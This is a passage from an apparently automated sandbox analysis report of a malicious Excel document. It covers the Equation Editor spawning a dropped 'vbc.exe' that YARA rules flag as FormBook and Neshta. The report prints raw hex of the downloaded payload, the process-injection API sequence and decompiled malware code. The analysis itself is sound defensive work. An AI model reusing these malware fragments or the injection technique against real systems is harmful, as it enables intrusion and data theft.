00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 30 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 1b 30 03 00 f9 00 00 00 03 00 00 11 02 7b 03 00 00 04 6f 23 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELa0fr @ @ Op H.texte f `.rsrcph@@.relocp@BTHHT!j s}s }(!({o"0(}-}+T{o#o$,{o#o%}+(s&}{o#{o'({,6{o(+()((-o{o+{o,o-}0){(.t\|(+30){(0t\|(+30{o#
Nov 25, 2021 19:05:27.867276907 CET	3	IN	Data Raw: 00 00 0a 28 31 00 00 0a 02 7b 03 00 00 04 6f 23 00 00 0a 28 32 00 00 0a 0a 06 72 01 00 00 70 28 33 00 00 0a 28 34 00 00 0a 16 73 35 00 00 0a 0b 02 7b 02 00 00 04 6f 28 00 00 0a 0c 38 89 00 00 00 12 02 28 29 00 00 0a 0d 07 09 6f 77 02 00 06 6f 36 Data Ascii: (1{o#(2rp(3(4s5{o(8()owo6 o7ovo6ouo+5o o7{-o6+{o8o6o-,oo9(:ko,o
Nov 25, 2021 19:05:27.867295027 CET	4	IN	Data Raw: 00 0a 25 02 7b 09 00 00 04 6f 53 00 00 0a 6f 54 00 00 0a 25 07 6f 55 00 00 0a 1e 58 6f 56 00 00 0a 25 07 6f 57 00 00 0a 1e 58 6f 58 00 00 0a 7d af 01 00 04 06 7b af 01 00 04 6f 2c 00 00 0a 07 6f 59 00 00 0a 07 1a 6f 5a 00 00 0a 07 1a 6f 5b 00 00 Data Ascii: %{oSoT%oUXoV%oWXoX}{o,oYoZo[s\o]{{{o^{o,{oYx0#}s{,{o0K{,{-*
Nov 25, 2021 19:05:27.867311954 CET	5	IN	Data Raw: 0a 6f 2c 00 00 0a 02 7b 12 00 00 04 6f 59 00 00 0a 02 7b 0d 00 00 04 6f 6c 00 00 0a 6f 2c 00 00 0a 02 7b 13 00 00 04 6f 59 00 00 0a 02 7b 0d 00 00 04 16 6f 86 00 00 0a 02 7b 0d 00 00 04 6f 6d 00 00 0a 6f 2c 00 00 0a 02 7b 09 00 00 04 6f 59 00 00 Data Ascii: o,{oY{olo,{oY{o{omo,{oY{ hsroP{ o{o{os{Tsoop{rpoq{VGsroP{o{o{
Nov 25, 2021 19:05:27.981761932 CET	7	IN	Data Raw: 00 00 1b 30 04 00 5b 00 00 00 06 00 00 11 02 28 9d 00 00 0a 02 03 7d 17 00 00 04 02 16 7d 18 00 00 04 02 03 6f 77 02 00 06 03 6f 78 02 00 06 5a 03 6f 76 02 00 06 03 6f 78 02 00 06 5a 73 4d 00 00 0a 28 1d 00 00 06 02 28 1c 00 00 06 28 46 00 00 0a Data Ascii: 0[(}}owoxZovoxZsM(((Fot,oEP0(oooC[(oooC[(oo(,!((-}}o
Nov 25, 2021 19:05:27.981800079 CET	8	IN	Data Raw: 06 07 6f f0 01 00 06 0c 28 10 01 00 06 6f 01 01 00 06 08 6f 9b 02 00 06 2a 1e 02 7b 21 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 00 00 1b 30 04 00 cd 00 00 00 0f 00 00 11 02 28 9d 00 00 0a 02 03 6f 77 02 00 06 7d 1e 00 00 04 02 03 6f 76 02 00 06 7d Data Ascii: o(oo{!"}!*0(ow}ov}{{s}ouo+$o{{{{(o-,oowoxZovoxZsM((('(Fot,
Nov 25, 2021 19:05:27.981817961 CET	10	IN	Data Raw: 00 0a 2a 1e 02 7b 25 00 00 04 2a 22 02 03 7d 25 00 00 04 2a 1e 02 7b 26 00 00 04 2a 22 02 03 7d 26 00 00 04 2a 00 13 30 03 00 8f 00 00 00 14 00 00 11 02 28 9d 00 00 0a 02 03 72 63 02 00 70 28 bf 00 00 0a 6f c0 00 00 0a 28 3d 00 00 06 03 72 6d 02 Data Ascii: {%"}%{&"}&0(rcp(o(=rmp(o,^r{p(o-((?+o(4(((?(>oAs(2(>o{"}*0}'
Nov 25, 2021 19:05:27.981843948 CET	11	IN	Data Raw: 00 04 02 73 66 00 00 0a 7d 30 00 00 04 02 7b 2f 00 00 04 6f 6b 00 00 0a 02 7b 30 00 00 04 6f 6b 00 00 0a 02 7b 30 00 00 04 6f 6c 00 00 0a 6f 6a 00 00 0a 02 7b 30 00 00 04 6f 6d 00 00 0a 6f 6a 00 00 0a 02 7b 30 00 00 04 6f 6a 00 00 0a 02 28 6a 00 Data Ascii: sf}0{/ok{0ok{0oloj{0omoj{0oj(j{.on{.o{.soop{.rpoq{. TsroP{.o{.os{.Qs\o{/on{/soop
Nov 25, 2021 19:05:27.981867075 CET	12	IN	Data Raw: 6f 13 00 00 0a 2d e1 de 0a 06 2c 06 06 6f 12 00 00 0a dc 2a 00 00 01 10 00 00 02 00 60 00 23 83 00 0a 00 00 00 00 36 02 04 6f f1 00 00 0a 28 68 00 00 06 2a 00 00 1b 30 01 00 2e 00 00 00 1b 00 00 11 02 28 62 00 00 06 6f ed 00 00 0a 0a 2b 0b 06 6f Data Ascii: o-,o`#6o(h0.(bo+ooo-,o#(f~{4oisoF(_,(jZ{2,{2oz,{6,{6o(2
Nov 25, 2021 19:05:27.981889009 CET	14	IN	Data Raw: 54 01 00 00 20 f1 00 00 00 73 72 00 00 0a 28 95 00 00 0a 02 28 2c 00 00 0a 02 7b 45 00 00 04 6f 59 00 00 0a 02 1c 28 96 00 00 0a 02 72 4d 03 00 70 28 71 00 00 0a 02 72 65 03 00 70 6f 78 00 00 0a 02 02 fe 06 85 00 00 06 73 5c 00 00 0a 28 06 01 00 Data Ascii: T sr((,{EoY(rMp(qrepoxs\((({Q}Q({U{Q.+oF{bo(J{b(oF{Xoo6{XoF{Yoo*6{Yo
Nov 25, 2021 19:05:27.981911898 CET	15	IN	Data Raw: 00 00 04 02 7b 5c 00 00 04 6f 6b 00 00 0a 02 7b 5d 00 00 04 6f 6b 00 00 0a 02 7b 62 00 00 04 6f 6b 00 00 0a 02 28 6a 00 00 0a 02 7b 54 00 00 04 17 6f 8e 00 00 0a 02 7b 54 00 00 04 1f 0f 1f 0c 73 6f 00 00 0a 6f 70 00 00 0a 02 7b 54 00 00 04 72 79 Data Ascii: {\ok{]ok{bok(j{To{Tsoop{Trypoq{TGsroP{Tos{TrIpox{Uo{Uo#%rgp%rpo"{U\soop{Urpoq{URsroP

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2688 Parent PID: 596

General

Start time:	19:04:18
Start date:	25/11/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f8b0000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 3020 Parent PID: 596

General

Start time:	19:04:40
Start date:	25/11/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 1624 Parent PID: 3020

General

Start time:	19:04:43
Start date:	25/11/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\vbc.exe"
Imagebase:	0x12f0000
File size:	750080 bytes
MD5 hash:	748F5D75A9F4C4026CC14E46BAFF0BB3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.472098761.000000000281B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2576 Parent PID: 1624

General

Start time:	19:04:45
Start date:	25/11/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x12f0000
File size:	750080 bytes
MD5 hash:	748F5D75A9F4C4026CC14E46BAFF0BB3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000005.00000000.469402863.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000005.00000000.466923037.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000005.00000000.468925310.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000005.00000000.467300347.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000005.00000000.468071854.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000005.00000000.468443002.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000005.00000000.467692423.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 1624 Parent PID: 3020 vbc.exeCOMMON

Executed Functions

Function 001E1E38, Relevance: 11.3, Strings: 8, Instructions: 1263COMMON

Download Yara Rule

Strings

,/l, xrefs: 001E35EF
48l, xrefs: 001E241B
P, xrefs: 001E2C8A
=, xrefs: 001E2671
48l, xrefs: 001E240D
`!l, xrefs: 001E284F
48l, xrefs: 001E232D
,/l, xrefs: 001E35E3

Memory Dump Source

Source File: 00000004.00000002.470150759.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: ,/l$,/l$48l$48l$48l$=$P$`!l
API String ID: 0-3041042060
Opcode ID: 1b75b0b8cab42bbf4ad1ab463f277dc83c08318649f8df2269214d1b18adaa97
Instruction ID: 4f873956177bc1a8d1b505a356b03dff2ee51b37ffc246e0a8657de1e3394f90
Opcode Fuzzy Hash: 1b75b0b8cab42bbf4ad1ab463f277dc83c08318649f8df2269214d1b18adaa97
Instruction Fuzzy Hash: 7DB21530E08689CFCB14CFA9C861ABDBBB5FF49300F15826AE5469B292D738DD51CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001EC7B0, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001ECA77

Memory Dump Source

Source File: 00000004.00000002.470150759.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5b1a7e9712de1cb6dfb211184d08d6cfef61f093621be86d1024b6e3d8e66841
Instruction ID: bfa52cf85aeac4e7dff0348191cea7ff487ef7e3cd2ad98ced838156d4ecd405
Opcode Fuzzy Hash: 5b1a7e9712de1cb6dfb211184d08d6cfef61f093621be86d1024b6e3d8e66841
Instruction Fuzzy Hash: 1EC12370D0026D8BCB24DFA5CC41BEDBBB1BB49308F0095A9E959A7240EB749A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001EC418, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001EC4EB

Memory Dump Source

Source File: 00000004.00000002.470150759.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6b0f8393bdc0166590039e0f838421aa082e9da27139ecfca5bb74818aa6e838
Instruction ID: 3dc9c3969e80e7dc7b8d5d4ff59fab882c5ebc917c2708fddfca07c2c595fabf
Opcode Fuzzy Hash: 6b0f8393bdc0166590039e0f838421aa082e9da27139ecfca5bb74818aa6e838
Instruction Fuzzy Hash: 7D4198B4D052589FCF00CFA9D984AEEFBF1BB49304F20942AE815B7240D774AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001EC578, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001EC62A

Memory Dump Source

Source File: 00000004.00000002.470150759.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5b40182172560ed0293b4f26f31fc4f0a3e70de11f7c23e560612fc02d1c6d82
Instruction ID: e9fcf301bd567b16579880c22693d3b4e90394f17400cebf68ec37524711bbb8
Opcode Fuzzy Hash: 5b40182172560ed0293b4f26f31fc4f0a3e70de11f7c23e560612fc02d1c6d82
Instruction Fuzzy Hash: 4F41B9B5D042589FCF00CFA9D884AEEFBB1BF49314F10A42AE815B7200D775A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001EC2F0, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001EC39A

Memory Dump Source

Source File: 00000004.00000002.470150759.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f4ec6e8e867c3e85c9ad305d72ef5603779568491b16341af8d44d8117fa5ab8
Instruction ID: 89c03e802ec15bacfae391795f658a2d66ea176047e27a7d7de33b9bae0b50e2
Opcode Fuzzy Hash: f4ec6e8e867c3e85c9ad305d72ef5603779568491b16341af8d44d8117fa5ab8
Instruction Fuzzy Hash: AD41A7B8D042589FCF00CFA9D880ADEFBB1FB49314F20942AE915B7200D735A906CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 001EC1C0, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 001EC26F

Memory Dump Source

Source File: 00000004.00000002.470150759.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9f079ad357809e1cebf9a61e2a7e7ef1a7d680a7d932460ac844dde94f07ebd1
Instruction ID: 64e0cfd037d0664975c393348a6eca5c009e2dc807888075d24116f0b685b8ec
Opcode Fuzzy Hash: 9f079ad357809e1cebf9a61e2a7e7ef1a7d680a7d932460ac844dde94f07ebd1
Instruction Fuzzy Hash: 3C41BCB5D002599FCF14CFA9D884AEEFBB1BF49314F24842AE518B7240D778A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001EC0D0, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 001EC14E

Memory Dump Source

Source File: 00000004.00000002.470150759.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b69d2fe32268535afcb8f0fabd024265e6529798dd3de00ebd415e3cf8194f8e
Instruction ID: 7be18312118e15e13ab776f33d736347492d1c9b4a1a1c15265592dcf033c26a
Opcode Fuzzy Hash: b69d2fe32268535afcb8f0fabd024265e6529798dd3de00ebd415e3cf8194f8e
Instruction Fuzzy Hash: 8831B9B4D04218AFCF14CFA9D884ADEFBB5AF49314F24942AE815B7300D775A905CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0013D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.470087851.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9527ca1fd596585b3f65024737b8a993d40339d71479f7e468c8b7a0d07c296a
Instruction ID: ab5443df28092978ff6a4afcc976788bdf523a9bd0f982c1c39663e8f316f7ce
Opcode Fuzzy Hash: 9527ca1fd596585b3f65024737b8a993d40339d71479f7e468c8b7a0d07c296a
Instruction Fuzzy Hash: 3C21F5B5608208DFDB18DF14F884B16BB65FB88714F34C569F9494B246C336D807CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0013D006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.470087851.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ad5f1b355070ba17388e1a05e27b6ba5814c0d72621dd9c74db730815616541
Instruction ID: af16117e1b8d54c9e5a90541fae9a84c57cb97a35705e1f62e402bd1c6534649
Opcode Fuzzy Hash: 2ad5f1b355070ba17388e1a05e27b6ba5814c0d72621dd9c74db730815616541
Instruction Fuzzy Hash: 1D217F754083849FCB06CF24E994B15BFB1EB46314F28C5DAD8498B266C33AD81ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0012D1C1, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.470065940.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e07afbbacd41032043c74e92f08be74c878a28d035750ccd65fc4497aa60ec4e
Instruction ID: 623f37b83a80441a693f4978d8acb777c147e0bd57a9e50a364fc5d1bf3f5051
Opcode Fuzzy Hash: e07afbbacd41032043c74e92f08be74c878a28d035750ccd65fc4497aa60ec4e
Instruction Fuzzy Hash: 5F01A231008768EAE7548A25FC84B67BFD8EF51324F29C05AEE045B283D378DC54D6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0012D1C0, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.470065940.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cc37c091c08cfa31c3d1e3c03d834282c7a1d0e85a68933af30e8f6fddc2ff4
Instruction ID: 1c90c60458128d41d2eaf68f68b96bafb679fb9fae2ebc05c97ce4e12d2cc58a
Opcode Fuzzy Hash: 9cc37c091c08cfa31c3d1e3c03d834282c7a1d0e85a68933af30e8f6fddc2ff4
Instruction Fuzzy Hash: 8CF04F71404654AAE7108A15E888B66FF98EB51724F28C55AED085B282D3789C44CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001E55D0, Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

l]Y, xrefs: 001E5644
@2l, xrefs: 001E57CD

Memory Dump Source

Source File: 00000004.00000002.470150759.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: @2l$l]Y
API String ID: 0-2022954373
Opcode ID: a4332e49e8a3f447ea958789628567c23d746120857f3ae973fdeb8d0056516a
Instruction ID: 40ee35a4866bf50c945417457b9c4f143384fadb4b35ecf890d04a27ef76a8d0
Opcode Fuzzy Hash: a4332e49e8a3f447ea958789628567c23d746120857f3ae973fdeb8d0056516a
Instruction Fuzzy Hash: B2510B7090525CCBD748EFBAE881B9DBBF3AFC8308F01C529D104AB664EB7459568B91

Uniqueness

Uniqueness Score: -1.00%

Function 001E72C2, Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

UUUU, xrefs: 001E73AC
K, xrefs: 001E747D

Memory Dump Source

Source File: 00000004.00000002.470150759.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: K$UUUU
API String ID: 0-2859847017
Opcode ID: 0fe4884bde4626d5a197f5c47c3d9d9f4efaa7cd5efd0b553bc46148466fb69a
Instruction ID: d2a207cbd71b355b36709e752f0d5228348e652e35c5b163b9eba2bc1cc78d76
Opcode Fuzzy Hash: 0fe4884bde4626d5a197f5c47c3d9d9f4efaa7cd5efd0b553bc46148466fb69a
Instruction Fuzzy Hash: BA519270E116188FEBA4CFADD980B8DFBF2AF49300F1485A9E528E7215D7349A85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 012FA2A9, Relevance: .9, Instructions: 896COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.471595932.00000000012F2000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000004.00000002.471588973.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.471939633.00000000013AA000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
Instruction ID: 01d88a083d15c00f86a3a4bc39e7355c3f8a2492d3565937d0ca7c89661f2ec1
Opcode Fuzzy Hash: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
Instruction Fuzzy Hash: 7062466144F7C19FC7134B746DB56E2BFB1AE67218B1E44DBC4C08F0A3E22A195AD722

Uniqueness

Uniqueness Score: -1.00%

Function 001E17B0, Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.470150759.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b03e4b4b7077816821a94370901ca6cd4901772ce9b798525838c91e23203dc
Instruction ID: 0f2136b484ee7de12ebc29c39ff4e6a37383b48da9719ce97c30b19c0219f17c
Opcode Fuzzy Hash: 7b03e4b4b7077816821a94370901ca6cd4901772ce9b798525838c91e23203dc
Instruction Fuzzy Hash: 46C14231A09AC4DBC7148F7AC8506BEBBF1EF81300F1585AFE495CB292E3789985C752

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 2576 Parent PID: 1624 vbc.exeCOMMON

Executed Functions

Function 00405634, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00405634(void* __eax, intOrPtr __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v292;
				char _v336;
				void* __ebx;
				void* __edi;
				void* __ebp;
				CHAR* _t38;
				void* _t39;
				int _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t60;
				void* _t63;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				struct _WIN32_FIND_DATAA* _t87;

				_t85 = __esi;
				_t70 = __edx;
				_t61 = __ecx;
				_t60 = __eax;
				asm("pushad");
				E004052D8(__eax);
				 *((intOrPtr*)(_t60 + 0x18)) = E0040456C();
				asm("popad");
				asm("pushad");
				_t2 = _t60 + 0x1c; // 0x1c
				E004030E8(_t2, _t70);
				asm("popad");
				if( *((intOrPtr*)(_t60 + 0x1c)) != 0) {
					asm("pushad");
					_t4 = _t60 + 0x1c; // 0x1c
					E00404DB8( *_t4, _t4);
					_t32 =  *((intOrPtr*)(_t60 + 0x20));
					if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
						_t56 = E00405C80();
						 *((intOrPtr*)(_t60 + 0x20)) = _t56;
						asm("popad");
						asm("pushad");
						_t57 = _t61;
						_t61 = _t56;
						_t58 = E004048D8(_t57, _t56, 0x40569b);
						_t82 = _t61;
						if(_t58 == 0) {
							_t82 = E004056A7;
						}
						_t32 = E00405CAC( *((intOrPtr*)(_t60 + 0x20)), _t82);
					}
					asm("popad");
					_t87 = _t86 + 0xfffffec0;
					_push(0);
					_push(0);
					E00405300(_t61, _t60, _t32, _t87, _t83, _t85);
					_pop(_t63);
					E00403258( &_v336, _t63,  *((intOrPtr*)(_t60 + 0x1c)));
					E004044A8();
					_t38 = _t63;
					_push(_t38);
					_t39 = FindFirstFileA(_t38, _t87); // executed
					_t84 = _t39;
					asm("pushfd");
					E00403094(_t87);
					asm("popfd");
					if(_t39 + 1 != 0) {
						do {
							if(E0040536C(_t60, _t60, _v336,  &_v292, _t84, _t85, _a4) != 0) {
								asm("jecxz 0x16");
								 *((intOrPtr*)(_t60 + 0x24))(_t87, 1);
								asm("jecxz 0x22");
								asm("loop 0x31");
								_push(E00402448(0x140));
								E004045E8( *((intOrPtr*)(_t60 + 0x18)), _t50);
								_pop(_t80);
								_t69 = 0x140;
								E0040254C(_t87, _t69, _t80);
							}
							_t45 = FindNextFileA(_t84, _t87); // executed
						} while (_t45 != 0);
						FindClose(_t84);
					}
				}
				 *((intOrPtr*)(_t60 + 0x20)) = 0;
				return E00404520( *((intOrPtr*)(_t60 + 0x20)));
			}

0x00405634
0x00405634
0x00405634
0x00405639
0x0040563b
0x0040563c
0x00405646
0x00405649
0x0040564a
0x0040564b
0x0040564e
0x00405653
0x00405659
0x0040565f
0x00405660
0x00405665
0x0040566a
0x0040566f
0x00405671
0x00405676
0x00405679
0x0040567a
0x0040567c
0x0040567c
0x00405682
0x00405689
0x0040568a
0x0040568c
0x0040568c
0x00405694
0x00405694
0x004056a9
0x004056aa
0x004056b2
0x004056b3
0x004056b7
0x004056c3
0x004056c5
0x004056ca
0x004056cf
0x004056d2
0x004056d5
0x004056da
0x004056df
0x004056e0
0x004056e5
0x004056e7
0x004056e9
0x004056fc
0x00405701
0x0040570f
0x00405713
0x00405715
0x00405722
0x00405727
0x0040572c
0x0040572d
0x00405730
0x00405730
0x00405737
0x0040573c
0x00405741
0x00405741
0x00405746
0x0040574e
0x00405759

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,004082B4,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,0040754A,00000000,004075DB), ref: 004056D5
FindNextFileA.KERNEL32(00000000,?,004082B4,?,00000000,00000000,004082B4,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,0040754A), ref: 00405737
FindClose.KERNEL32(00000000,00000000,?,004082B4,?,00000000,00000000,004082B4,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741

Strings

*.*, xrefs: 0040567D

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: *.*
API String ID: 3541575487-438819550
Opcode ID: 84b9be3e5ad99934bff3c4df5d46ec0509802c264b50a569ef0c2859bc3d2c02
Instruction ID: e0bf5d45d2763b4aada85c2368977cee553341535aa4efecd7ed3e039fa03a50
Opcode Fuzzy Hash: 84b9be3e5ad99934bff3c4df5d46ec0509802c264b50a569ef0c2859bc3d2c02
